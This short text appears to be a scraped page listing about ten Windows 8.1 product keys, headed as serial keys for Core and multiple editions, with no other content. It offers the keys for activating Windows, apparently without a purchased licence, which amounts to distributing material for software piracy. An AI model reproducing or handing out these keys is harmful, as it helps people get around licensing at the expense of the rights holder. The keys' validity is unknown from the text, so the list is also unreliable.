MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
Windows 8.1 Serial Keys
TGXN4-BPPYC-TJYMH-3WXFK-4JMQH
N9C46-MKKKR-2TTT8-FJCJP-4RDG7
Q4NBQ-3DRJD-777XK-MJHDC-749T7
4NMMK-QJH7K-F38H2-FQJ24-2J8XV
84NRV-6CJR6-DBDXH-FYTBF-4X49V
D7KN2-CBVPG-BC7YC-9JDVJ-YPWXV
3NHJ7-3WWQK-4RFTH-8FHJY-PRYQH
988NM-XKXT9-7YFWH-H2Q3Q-C34DH
2VTNH-323J4-BWP98-TX9JR-FCWXV
Windows 8.1 (Core | Multiple Editions) Keys